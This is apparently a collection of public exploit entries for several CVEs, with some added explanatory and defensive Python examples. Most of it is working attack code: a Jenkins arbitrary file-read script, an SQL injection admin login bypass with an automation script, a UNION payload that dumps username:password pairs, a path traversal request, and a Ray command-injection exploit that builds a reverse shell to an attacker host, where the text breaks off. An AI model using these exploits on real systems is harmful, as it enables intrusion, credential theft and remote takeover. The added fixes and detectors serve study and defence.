<pre><code># Exploit Title: Jenkins 2.441 - Local File Inclusion<br /># Date: 14/04/2024<br /># Exploit Author: Matisse Beckandt (Backendt)<br /># Vendor Homepage: https://www.jenkins.io/<br /># Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip<br /># Version: 2.441<br /># Tested on: Debian 12 (Bookworm)<br /># CVE: CVE-2024-23897<br /><br /># Arbitrary file read through the Jenkins CLI: the args4j parser behind the CLI expands an<br /># argument of the form "@/path/to/file" into the lines of that file, and connect-node echoes<br /># every expanded line back in its "No such agent ... exists." error. The script uses the<br /># remoting-less HTTP transport of /cli: two requests share a Session id, the "upload" side<br /># carries the command frames and the "download" side receives the output.<br /># Users without Overall/Read permission only get the first lines of a file back; with<br /># Overall/Read the whole file can be read.<br /><br />import os<br />import sys<br />from argparse import ArgumentParser<br />from requests import Session, post, exceptions<br />from threading import Thread<br />from uuid import uuid4<br />from time import sleep<br />from re import findall<br /><br />class Exploit(Thread):<br />    def __init__(self, url: str, identifier: str):<br />        Thread.__init__(self)<br />        self.daemon = True<br />        self.url = url<br />        self.params = {"remoting": "false"}<br />        self.identifier = identifier<br />        self.stop_thread = False<br />        self.listen = False<br /><br />    def run(self):<br />        while not self.stop_thread:<br />            if self.listen:<br />                self.listen_and_print()<br />            sleep(0.05)  # do not spin at 100% CPU while idle<br /><br />    def stop(self):<br />        self.stop_thread = True<br /><br />    def receive_next_message(self):<br />        self.listen = True<br /><br />    def wait_for_message(self):<br />        while self.listen:<br />            sleep(0.5)<br /><br />    def print_formatted_output(self, output: str):<br />        if "ERROR: No such file" in output:<br />            print("File not found.")<br />        elif "ERROR: Failed to parse" in output:<br />            print("Could not read file.")<br /><br />        # connect-node reports every expanded line of the @file as an unknown agent name<br />        expression = "No such agent \"(.*)\" exists."<br />        results = findall(expression, output)<br />        print("\n".join(results))<br /><br />    def listen_and_print(self):<br />        # The download side blocks until Jenkins has produced the command output<br />        session = Session()<br />        headers = {"Side": "download", "Session": self.identifier}<br />        try:<br />            response = session.post(self.url, params=self.params, headers=headers)<br />        except (exceptions.ConnectTimeout, exceptions.ConnectionError):<br />            print("Could not connect to target to setup the listener.")<br />            os._exit(1)  # sys.exit() would only end this thread and leave main() waiting forever<br /><br />        self.print_formatted_output(response.text)<br />        self.listen = False<br /><br />    def send_file_request(self, filepath: str):<br />        headers = {"Side": "upload", "Session": self.identifier}<br />        payload = get_payload(filepath)<br />        try:<br />            post(self.url, data=payload, params=self.params, headers=headers, timeout=4)<br />        except (exceptions.ConnectTimeout, exceptions.ConnectionError):<br />            print("Could not connect to the target to send the request.")<br />            sys.exit(1)<br /><br />    def read_file(self, filepath: str):<br />        self.receive_next_message()<br />        sleep(0.1)  # let the download side connect before the command is sent<br />        self.send_file_request(filepath)<br />        self.wait_for_message()<br /><br />def get_payload_message(operation_index: int, text: str) -> bytes:<br />    # One CLI frame: 4-byte big-endian frame length, 1-byte opcode, then the argument as a<br />    # 2-byte length-prefixed UTF-8 string (Java writeUTF layout)<br />    text_bytes = bytes(text, "utf-8")<br />    text_size = len(text_bytes)<br />    text_message = text_size.to_bytes(2, "big") + text_bytes<br />    message_size = len(text_message)<br /><br />    payload = message_size.to_bytes(4, "big") + operation_index.to_bytes(1, "big") + text_message<br />    return payload<br /><br />def get_payload(filepath: str) -> bytes:<br />    arg_operation = 0    # ARG opcode<br />    start_operation = 3  # START opcode<br /><br />    command = get_payload_message(arg_operation, "connect-node")<br />    poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")<br /><br />    payload = command + poisoned_argument + start_operation.to_bytes(1, "big")<br />    return payload<br /><br />def start_interactive_file_read(exploit: Exploit):<br />    print("Press Ctrl+C to exit")<br />    while True:<br />        filepath = input("File to download:\n> ")<br />        filepath = make_path_absolute(filepath)<br /><br />        try:<br />            exploit.read_file(filepath)<br />        except exceptions.ReadTimeout:<br />            print("Payload request timed out.")<br /><br />def make_path_absolute(filepath: str) -> str:<br />    # Relative paths are resolved against the working directory of the Jenkins process<br />    if not filepath.startswith('/'):<br />        return f"/proc/self/cwd/{filepath}"<br />    return filepath<br /><br />def format_target_url(url: str) -> str:<br />    if url.endswith('/'):<br />        url = url[:-1]<br />    return f"{url}/cli"<br /><br />def get_arguments():<br />    parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")<br />    parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")<br />    parser.add_argument("-p", "--path", help="The absolute path of the file to download")<br />    return parser.parse_args()<br /><br />def main():<br />    args = get_arguments()<br />    url = format_target_url(args.url)<br />    filepath = args.path<br />    identifier = str(uuid4())<br /><br />    exploit = Exploit(url, identifier)<br />    exploit.start()<br /><br />    if filepath:<br />        filepath = make_path_absolute(filepath)<br />        try:<br />            exploit.read_file(filepath)<br />        except exceptions.ReadTimeout:<br />            print("Payload request timed out.")<br />        exploit.stop()<br />        return<br /><br />    try:<br />        start_interactive_file_read(exploit)<br />    except KeyboardInterrupt:<br />        pass<br />    print("\nQuitting")<br />    exploit.stop()<br /><br />if __name__ == "__main__":<br />    main()<br /><br /></code></pre>
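As an added example (not part of the exploit above), the following Python encodes ARG frames with the same layout as get_payload_message(), decodes them back, and simulates the args4j "@file" expansion that turns each line of the target file into a separate command argument, followed by the connect-node error text that the script's regex scrapes. The file contents and the error emulation are constructed for the demo; only the frame layout and the regex come from the script.

```python
import re
import struct

OP_ARG = 0  # ARG opcode, the arg_operation value used by get_payload() above

# Constructed stand-in for files on the Jenkins controller (not real data)
FAKE_FILES = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "jenkins:x:1000:1000::/var/lib/jenkins:/bin/sh\n",
}

# The regex the exploit applies to the output of the download side
AGENT_ERROR = re.compile(r'No such agent "(.*)" exists\.')


def encode_arg(text: str) -> bytes:
    """One ARG frame laid out like get_payload_message(): 4-byte big-endian frame
    length, 1-byte opcode, then a 2-byte length-prefixed UTF-8 string."""
    body = text.encode("utf-8")
    utf = struct.pack(">H", len(body)) + body
    return struct.pack(">I", len(utf)) + bytes([OP_ARG]) + utf


def decode_args(stream: bytes) -> list:
    """Walk the frames of an upload stream and return the ARG strings in order.
    Trailing bytes shorter than a frame header (the lone START byte the exploit
    appends) end the walk."""
    args = []
    pos = 0
    while pos + 5 <= len(stream):
        (framelen,) = struct.unpack_from(">I", stream, pos)
        opcode = stream[pos + 4]
        frame = stream[pos + 5:pos + 5 + framelen]
        pos += 5 + framelen
        if opcode == OP_ARG:
            (n,) = struct.unpack_from(">H", frame, 0)
            args.append(frame[2:2 + n].decode("utf-8"))
    return args


def expand_at_files(args: list, files: dict) -> list:
    """args4j-style @file expansion: an argument "@path" becomes one argument per
    line of that file. This is the behaviour CVE-2024-23897 abuses."""
    expanded = []
    for arg in args:
        if arg.startswith("@") and arg[1:] in files:
            expanded.extend(files[arg[1:]].splitlines())
        else:
            expanded.append(arg)
    return expanded


def connect_node_errors(expanded_args: list) -> str:
    """Emulation of the error text connect-node returns for unknown node names:
    one line per argument after the command name."""
    return "\n".join(f'No such agent "{name}" exists.' for name in expanded_args[1:])


def leaked_lines(stream: bytes, files: dict) -> list:
    """End to end: decode the frames, expand @files, emulate the error output and
    recover the file lines with the exploit's regex."""
    output = connect_node_errors(expand_at_files(decode_args(stream), files))
    return AGENT_ERROR.findall(output)


if __name__ == "__main__":
    stream = encode_arg("connect-node") + encode_arg("@/etc/passwd") + bytes([3])
    print(stream.hex())
    for line in leaked_lines(stream, FAKE_FILES):
        print(line)
```

The decoder stops at the single START byte exactly as the script emits it, so the stream it parses is byte-for-byte what get_payload() produces.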
<pre><code># Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure<br /># Date: 2023-08-14<br /># Exploit Author: VB<br /># Vendor Homepage: https://sourceforge.net/projects/open-clinic/<br /># Software Link: https://sourceforge.net/projects/open-clinic/<br /># Version: OpenClinic GA 5.247.01<br /># Tested on: Windows 10, Windows 11<br /># CVE: CVE-2023-40278<br /><br /># Details<br />An information disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The page returns a different error message depending on whether the supplied AppointmentUid exists, so the response can be used as an oracle to enumerate valid appointment identifiers without access to the appointment data itself.<br /><br /># Proof of Concept (POC)<br />Steps to Reproduce:<br /><br />1. Access the vulnerable component:<br />- Navigate to the URL: http://[IP]:10088/openclinic/planning/printAppointmentPdf.jsp?AppointmentUid=1.1<br /><br />2. Manipulate the AppointmentUid parameter:<br />- Change the `AppointmentUid` value and request the page again, for example with different numerical values or formats (the example above uses the `1.1` form).<br /><br />3. Observe the responses:<br />- A "document is not open" error indicates that an appointment with the specified ID exists.<br />- Any other error message or response indicates that it does not.<br /><br />4. Confirm the vulnerability:<br />- The differing error messages confirm the information disclosure: an unauthorized user can deduce whether specific appointments exist without direct access to appointment data, and by enumerating identifiers can estimate the number of appointments performed by private clinics, surgeries and private doctors.<br /><br /></code></pre>
<pre><code># Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)<br /># Date: 2023-08-14<br /># Exploit Author: V. B.<br /># Vendor Homepage: https://sourceforge.net/projects/open-clinic/<br /># Software Link: https://sourceforge.net/projects/open-clinic/<br /># Version: OpenClinic GA 5.247.01<br /># Tested on: Windows 10, Windows 11<br /># CVE: CVE-2023-40279<br /><br /># Details<br />An issue was discovered in OpenClinic GA version 5.247.01: the 'Page' parameter of a GET request to 'main.do' selects the page to load without being restricted to the intended directory, so an authenticated user can traverse directories with '../' sequences. This allows the retrieval and execution of files from arbitrary directories.<br /><br /># Proof of Concept (POC)<br />Steps to Reproduce:<br /><br />1. Crafting the malicious GET request:<br /><br />- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite, with a valid authenticated session cookie (JSESSIONID).<br />- Format the GET request as follows (in this example, `../../main.jsp` is used to traverse out of the page directory and reach `main.jsp`):<br /><br />GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1<br />Host: 192.168.100.5:10088<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Connection: close<br />Cookie: JSESSIONID=[SESSION ID]<br />Cache-Control: max-age=0<br /><br />2. Confirming the vulnerability:<br /><br />- Send the crafted GET request to the target server.<br />- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, the directory path traversal is confirmed.<br />- Depending on what can be reached, this leads to sensitive information disclosure or more severe attacks.<br /><br /></code></pre>
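Added example, not OpenClinic code: how a handler like main.do could resolve the Page parameter safely, shown beside the unsafe concatenation, plus a log check that flags the requests that would have escaped the page directory. PAGE_ROOT and the access-log lines are constructed for the demo.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory that main.do is meant to serve pages from (assumption for the demo)
PAGE_ROOT = "/openclinic/pages"


def resolve_page_unsafe(page_param: str) -> str:
    """Shape of the flaw: the parameter is glued onto the page directory unchanged,
    so '../' sequences walk out of it. Returns the normalised path that would be opened."""
    return posixpath.normpath(PAGE_ROOT + "/" + page_param)


def resolve_page_safe(page_param: str):
    """Return the normalised path when it stays below PAGE_ROOT and names a .jsp,
    otherwise None. Backslashes are folded to '/' first because the tested platform
    (Windows) accepts both separators; absolute paths and NUL bytes are rejected."""
    candidate = page_param.replace("\\", "/")
    if candidate.startswith("/") or "\x00" in candidate:
        return None
    full = posixpath.normpath(PAGE_ROOT + "/" + candidate)
    if not full.startswith(PAGE_ROOT + "/"):
        return None
    if not full.endswith(".jsp"):
        return None
    return full


def flag_traversal_requests(access_log_lines: list) -> list:
    """Return the Page values of main.do requests that resolve_page_safe() would have
    refused. parse_qs() percent-decodes, so ..%2F..%2F variants are caught as well."""
    flagged = []
    for line in access_log_lines:
        parts = line.split()
        # common log format: the request target is the 7th whitespace-separated field
        if len(parts) < 7 or "main.do" not in parts[6]:
            continue
        query = urlsplit(parts[6]).query
        for page in parse_qs(query).get("Page", []):
            if resolve_page_safe(page) is None:
                flagged.append(page)
    return flagged


# Constructed access-log lines for the demo (not from a real server)
SAMPLE_LOG = [
    '192.168.100.9 - - [14/Aug/2023:10:00:00 +0000] "GET /openclinic/main.do?Page=main.jsp HTTP/1.1" 200 4212',
    '192.168.100.9 - - [14/Aug/2023:10:00:05 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 4212',
    '192.168.100.9 - - [14/Aug/2023:10:00:09 +0000] "GET /openclinic/main.do?Page=..%2F..%2Fmain.jsp HTTP/1.1" 200 4212',
    '192.168.100.9 - - [14/Aug/2023:10:00:12 +0000] "GET /openclinic/login.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print("unsafe:", resolve_page_unsafe("../../main.jsp"))
    print("safe:", resolve_page_safe("../../main.jsp"))
    print("flagged:", flag_traversal_requests(SAMPLE_LOG))
```

The prefix check runs on the normalised path, not on the raw parameter, so `sub/../other.jsp` is still accepted while anything that resolves above PAGE_ROOT is refused regardless of how the dots were encoded.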
<pre><code># Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass<br /># Date: 02/10/2024<br /># Exploit Author: Diyar Saadi<br /># Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip<br /># Version: V 1.2<br /># Tested on: Windows 11 + XAMPP 8.0.30<br /><br />## Exploit Description ##<br /><br />SQL injection vulnerability in ofrs/admin/index.php:<br />The admin login script in ofrs/admin/index.php inserts the submitted username into its SQL query without sanitisation or parameter binding. An injected OR makes the query match the admin row on the username alone, so the password is never effectively checked.<br /><br />## Steps to reproduce ##<br /><br />1- Open the admin panel page at the following URL: http://localhost/ofrs/admin/index.php<br />2- Enter the following payload in the username box: admin'or'1--<br />3- Press the Login button or press Enter.<br /><br />The captured request below uses the shorter variant admin'or'--; both work for the same reason.<br /><br />## Proof Of Concept [1] ##<br /><br />POST /ofrs/admin/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 46<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/ofrs/admin/index.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29<br />Connection: close<br /><br />username=admin%27or%27--&inputpwd=&login=login<br /><br />## Proof Of Concept [ Python Based Script ] [2] ##<br /><br />import os<br />import requests<br />from selenium import webdriver<br />from selenium.webdriver.chrome.service import Service<br />from selenium.webdriver.common.by import By<br />from selenium.webdriver.support.ui import WebDriverWait<br />from selenium.webdriver.support import expected_conditions as EC<br /><br /><br />banner = """<br />░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗<br />██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝<br />██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░<br />██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗<br />╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝<br />░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░<br /># Code By : Diyar Saadi<br />"""<br /><br />print(banner)<br /><br />payload_requests = input("Enter the payload: ")<br /><br />url_requests = "http://localhost/ofrs/admin/index.php"<br /># Field names match the login form captured in PoC [1]: username, inputpwd, login<br />data = {<br />    'username': payload_requests,<br />    'inputpwd': 'password',<br />    'login': 'login'<br />}<br />headers = {<br />    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',<br />    'Content-Type': 'application/x-www-form-urlencoded'<br />}<br /><br />try:<br />    response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False, timeout=10)<br /><br />    # A successful bypass answers with a redirect to the admin dashboard<br />    if response.status_code == 302 and 'dashboard.php' in response.headers.get('Location', ''):<br />        print("Requests version: Admin Panel Successfully Bypassed !")<br /><br />        url_selenium = "http://localhost/ofrs/admin/index.php"<br />        chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe"<br /><br />        # Selenium 4: the driver binary is passed through Service, not as a Chrome argument<br />        driver = webdriver.Chrome(service=Service(executable_path=chrome_driver_path))<br />        driver.get(url_selenium)<br /><br />        # Fill the form fields directly instead of typing into whatever window has focus<br />        driver.find_element(By.NAME, "username").send_keys(payload_requests)<br />        driver.find_element(By.NAME, "inputpwd").send_keys(payload_requests)<br />        driver.find_element(By.NAME, "login").click()<br /><br />        WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php"))<br /><br />        screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png")<br />        driver.save_screenshot(screenshot_path)<br />        print(f"Selenium version: Screenshot saved as {screenshot_path}")<br /><br />        driver.quit()<br /><br />    else:<br />        print("Requests version: Login failed.")<br />except Exception as e:<br />    print(f"An error occurred: {e}")<br /><br /></code></pre>
<pre><code># Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection<br /># Date: February 6, 2024<br /># Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group<br /># Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip<br /># Tested on: Linux and Windows, XAMPP<br /># CVE: CVE-2023-51951<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># The web application Stock Management System v1.0 is affected by an unauthenticated SQL injection in the id parameter of<br /># /sms/admin/?page=purchase_order/manage_po. The script below uses a UNION-based payload to dump the users table: the<br /># injected group_concat() of username:password pairs is rendered back into the "remarks" textarea of the page.<br /><br />import argparse<br />import requests<br />from bs4 import BeautifulSoup<br /><br /><br />def print_header():<br />    print("\033[1m\nStock Management System v1.0\033[0m")<br />    print("\033[1mSQL Injection Exploit\033[0m")<br />    print("\033[96mby blu3ming\n\033[0m")<br /><br /><br />def parse_response(target_url):<br />    try:<br />        target_response = requests.get(target_url, timeout=10)<br />        soup = BeautifulSoup(target_response.text, 'html.parser')<br />        textarea = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'})<br />        if textarea is None:<br />            print("No data could be retrieved. Try again.")<br />            return<br /><br />        # group_concat() separates rows with ',' and each row is username:password<br />        users = textarea.text.split(',')<br />        for user in users:<br />            username, password = user.split(':', 1)<br />            print("| {:<20} | {:<40} |".format(username, password))<br />    except (requests.RequestException, ValueError):<br />        print("No data could be retrieved. Try again.")<br /><br /><br />def retrieve_data(base_url):<br />    target_path = '/sms/admin/?page=purchase_order/manage_po&id='<br />    # 13 columns in the original query; column 9 is the one echoed into the remarks field<br />    payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"<br /><br />    # Dump users table<br />    target_url = base_url.rstrip('/') + target_path + payload<br />    print("+----------------------+------------------------------------------+")<br />    print("| {:<20} | {:<40} |".format("username", "password"))<br />    print("+----------------------+------------------------------------------+")<br />    parse_response(target_url)<br />    print("+----------------------+------------------------------------------+\n")<br /><br /><br />if __name__ == "__main__":<br />    about = 'Unauthenticated SQL Injection Exploit - Stock Management System'<br />    parser = argparse.ArgumentParser(description=about)<br />    parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')<br />    args = parser.parse_args()<br />    print_header()<br />    retrieve_data(args.base_url)<br /><br /></code></pre>
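Both PHP applications above build their SQL by string concatenation. The added example below (not code from either project) reproduces the two injections against an in-memory SQLite database: the login bypass with the payloads from the Online Fire Reporting System advisory, and the UNION extraction of username:password pairs that the Stock Management System script parses out of the remarks textarea. The table layout and unsalted MD5 password storage are assumptions for the demo, and the UNION payload here uses two columns where the real one needs thirteen. Next to each vulnerable query is the parameterised version that closes the hole.

```python
import hashlib
import sqlite3

# The injection strings from the advisories above
BYPASS_PAYLOADS = ["admin'or'1--", "admin'or'--"]
UNION_PAYLOAD = "' union select 1,group_concat(username||':'||password) from users-- -"


def md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the two applications' tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", md5("Admin@123")), ("clerk", md5("Password@1"))])
    conn.execute("CREATE TABLE purchase_orders (id INTEGER PRIMARY KEY, remarks TEXT)")
    conn.execute("INSERT INTO purchase_orders (id, remarks) VALUES (1, 'first order')")
    return conn


def login_vulnerable(conn, username: str, password: str):
    """ofrs/admin/index.php style: the username lands inside the SQL string, so
    admin'or'1-- turns the WHERE clause into  username='admin' OR (...)  and the
    password comparison no longer matters."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{md5(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Same query with bound parameters: the quote in the payload is just data."""
    row = conn.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (username, md5(password))).fetchone()
    return row[0] if row else None


def manage_po_vulnerable(conn, po_id: str):
    """purchase_order/manage_po style: the id is concatenated, and the remarks
    column of whatever row comes back is rendered into the page's textarea."""
    sql = f"SELECT id, remarks FROM purchase_orders WHERE id = '{po_id}'"
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def manage_po_safe(conn, po_id: str):
    row = conn.execute("SELECT id, remarks FROM purchase_orders WHERE id = ?",
                       (po_id,)).fetchone()
    return row[1] if row else None


def dump_users_via_union(conn) -> list:
    """What the Stock Management System script does with the textarea text:
    split rows on ',' and each row on ':'."""
    remarks = manage_po_vulnerable(conn, UNION_PAYLOAD)
    if remarks is None:
        return []
    return [tuple(entry.split(":", 1)) for entry in remarks.split(",")]


if __name__ == "__main__":
    db = build_db()
    for payload in BYPASS_PAYLOADS:
        print(f"{payload!r}: vulnerable -> {login_vulnerable(db, payload, 'wrong')}, "
              f"safe -> {login_safe(db, payload, 'wrong')}")
    print(dump_users_via_union(db))
    print(manage_po_safe(db, UNION_PAYLOAD))
```

Note that in both bypass payloads the `--` ends up inside the quoted string rather than starting a comment; the bypass works because AND binds tighter than OR, so the row matches on `username='admin'` alone.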
<pre><code># Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path<br /># Google Dork: null<br /># Date: 4/10/2024<br /># Exploit Author: Joseph Kwabena Fiagbor<br /># Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/<br /># Software Link:<br /># Version: v.1.23.0.02<br /># Tested on: Windows 7-11<br /># CVE : CVE-2024-31804<br /><br />1. Description:<br /><br />The TerraTec DMX 6Fire USB control panel installs the service "ttdmx6firesvc" (DMX6Fire Control) with an unquoted service path, started automatically and running as LocalSystem. Because the path C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe contains a space and is not quoted, Windows (CreateProcess) tries C:\Program.exe before the intended binary. An authorized but non-privileged local user who can write to that location could therefore execute arbitrary code with SYSTEM privileges at the next service start. Default ACLs on the system drive do not let standard users create files in C:\, so the practical impact depends on the permissions of that directory (check with icacls C:\).<br /><br />2. Proof<br /><br />C:\Users\Astra>sc qc "ttdmx6firesvc"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ttdmx6firesvc<br />        TYPE               : 10  WIN32_OWN_PROCESS<br />        START_TYPE         : 2   AUTO_START<br />        ERROR_CONTROL      : 1   NORMAL<br />        BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service<br />        LOAD_ORDER_GROUP   : PlugPlay<br />        TAG                : 0<br />        DISPLAY_NAME       : DMX6Fire Control<br />        DEPENDENCIES       : eventlog<br />                           : PlugPlay<br />        SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
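Added example (not part of the advisory): a Python helper that reads `sc qc` output and lists the paths CreateProcess would try before the intended binary, i.e. the hijack candidates of an unquoted service path, together with whether the service runs as LocalSystem and starts automatically. The sample output is the one shown above; the parsing logic is my own.

```python
import ntpath

# Output of `sc qc ttdmx6firesvc` as shown in the advisory above
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ttdmx6firesvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service
        LOAD_ORDER_GROUP   : PlugPlay
        TAG                : 0
        DISPLAY_NAME       : DMX6Fire Control
        DEPENDENCIES       : eventlog
                           : PlugPlay
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text: str) -> dict:
    """Turn `sc qc` output into a dict of its UPPER_CASE fields. Continuation lines
    (the second DEPENDENCIES entry) have an empty key and are skipped."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        key = key.strip()
        if key and key.isupper():
            fields[key] = value.strip()
    return fields


def hijack_candidates(binary_path_name: str) -> list:
    """Paths CreateProcess tries before the intended executable when the service
    path is unquoted. Windows splits the command line at each space, appends .exe
    when the prefix has no extension, and runs the first file that exists; every
    candidate before the real binary is a hijack opportunity if its directory is
    writable. A quoted path is unambiguous and yields no candidates."""
    if binary_path_name.startswith('"'):
        return []
    tokens = binary_path_name.split(" ")
    prefixes = [" ".join(tokens[:i]) for i in range(1, len(tokens) + 1)]
    candidates = []
    for prefix in prefixes:
        if prefix.lower().endswith(".exe"):
            break  # reached the executable the service really points at
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    else:
        candidates.pop()  # no .exe anywhere: the last prefix is the binary itself
    return candidates


def assess(sc_qc_text: str) -> dict:
    """Summarise the exposure: hijack candidates plus whether the service starts
    automatically as LocalSystem, which is what makes the bug a privilege escalation."""
    fields = parse_sc_qc(sc_qc_text)
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "candidates": hijack_candidates(fields.get("BINARY_PATH_NAME", "")),
        "runs_as_system": fields.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
    }


if __name__ == "__main__":
    for key, value in assess(SC_QC_OUTPUT).items():
        print(f"{key}: {value}")
```

For each candidate, the next check on the target is whether its directory is writable by the low-privileged user (for C:\Program.exe that is the root of the system drive, which standard users cannot create files in by default).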
<pre><code># Exploit Title: Ray OS v2.6.3 - Command Injection RCE (Unauthenticated)<br /># Description:<br /># The Ray Project dashboard contains a CPU profiling page, and the format parameter is<br /># not validated before being inserted into a system command executed in a shell, allowing<br /># for arbitrary command execution. If the system is configured to allow passwordless sudo<br /># (a setup some Ray configurations require) this will result in a root shell being returned<br /># to the user. If not configured, a user level shell will be returned.<br /># Version: <= 2.6.3<br /># Date: 2024-4-10<br /># Exploit Author: Fire_Wolf<br /># Tested on: Ubuntu 20.04.6 LTS<br /># Vendor Homepage: https://www.ray.io/<br /># Software Link: https://github.com/ray-project/ray<br /># CVE: CVE-2023-6019<br /># Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe<br /># ==========================================================================================<br /><br />#!/usr/bin/python3<br /># coding=utf-8<br />import base64<br />import argparse<br />import requests<br />import urllib3<br /><br />headers = {<br />    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"<br />}<br /><br /><br />def check_url(target, port):<br />    """Return the dashboard base URL. Without a scheme, http is probed first, then https."""<br />    port = str(port)<br />    if target.startswith("http://") or target.startswith("https://"):<br />        return target + ":" + port<br />    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />    for scheme in ("http://", "https://"):<br />        test_url = scheme + target + ":" + port<br />        try:<br />            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)<br />            if response.status_code == 200:<br />                return test_url<br />        except requests.RequestException as e:<br />            print("ERROR! The Exception is: " + str(e))<br />    return "http://" + target + ":" + port<br /><br /><br />def exp(target, ip, lhost, lport):<br />    # Reverse shell, base64-encoded so that the URL only has to carry [A-Za-z0-9+/=]<br />    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + str(lport) + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''<br />    print("[*]Payload is: " + payload)<br />    b64_payload = base64.b64encode(payload.encode()).decode()<br />    print("[*]Base64 encoding payload is: " + b64_payload)<br />    # The format value is inserted unquoted into the py-spy command 